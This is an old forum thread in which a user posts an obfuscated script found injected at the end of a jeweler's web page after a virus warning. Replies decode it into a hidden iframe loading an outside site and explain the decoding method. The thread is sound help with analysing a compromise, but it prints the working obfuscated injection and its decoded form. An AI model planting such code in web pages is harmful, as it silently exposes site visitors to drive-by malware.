| Home | Forums | Reviews | Guides | Newsgroups | Register | Search |
 |
| Thread Tools |
|
Guest
Posts: n/a
|
Hello,
a friend visited a commercial jeweler's website and somehow got a virus warning on her computer ("win32/worfo"). I checked out the site in question, but could find nothing on the home page code except the last line in the source code, located after the body end-tag. The line is this: <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2  ?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>I don't have a clue what this means. Can anyone help? thanks, Jack M |
|
|
|
|||
|
|
| |
|
Guest
Posts: n/a
|
> "Jack Mahon" <> wrote:
> news:viJVf.13061$%H.12433@clgrps13.... > > Hello, > > a friend visited a commercial jeweler's website and somehow got a > virus warning on her computer ("win32/worfo"). > > I checked out the site in question, but could find nothing on the > home page code except the last line in the source code, located > after the body end-tag. > > The line is this: > <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2 ?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>> > I don't have a clue what this means. Can anyone help? Looks like it adds a hidden iframe. document.write("<iframe style='display:none' width=1 height=1 src='http://trust4free.ws/?id=index19'></iframe>"); -- BootNic Monday, March 27, 2006 12:51 AM Have no fear of perfection - you'll never reach it. *Salvador Dali* |
|
|
|
|
|||
|
|
| |
|
Guest
Posts: n/a
|
|
|
|
|
||
|
Guest
Posts: n/a
|
> "gerg" <> wrote:
> news:. ... > >>> <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu >2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy2 ?=0jgsbnf?#*<';o='';for(i=0;i<113;i ++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>>> Looks like it adds a hidden iframe. >> >> document.write("<iframe style='display:none' width=1 height=1 >> src='http://trust4free.ws/?id=index19'></iframe>"); >> >> > How in the world did you derive that? Not doubting your ability, > but it looked like total gibberish. Replace eval(o); with alert(o); -- BootNic Monday, March 27, 2006 9:04 PM "I've noticed that the press tends to be quite accurate, except when they're writing on a subject I know something about." *Keith F. Lynch* |
|
|
|
|
|||
|
|
| |
|
| Thread Tools | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Malicious TAGS | adyda | HTML | 3 | 09-25-2005 10:04 AM |
| ActiveX apologetic Larry Seltzer... "Sun paid for malicious ActiveX code, and Firefox is bad, bad bad baad. please use ActiveX, it's secure and nice!" (ok, the last part is irony on my part) | fernando.cassia@gmail.com | Java | 0 | 04-16-2005 10:05 PM |
| preventing malicious user input | Stimp | ASP .Net | 1 | 09-15-2004 03:25 AM |
| Malicious websites | bjones | Computer Support | 27 | 12-09-2003 08:02 PM |
| malicious forged posts in my name | miss calm | Computer Support | 13 | 08-10-2003 03:18 AM |
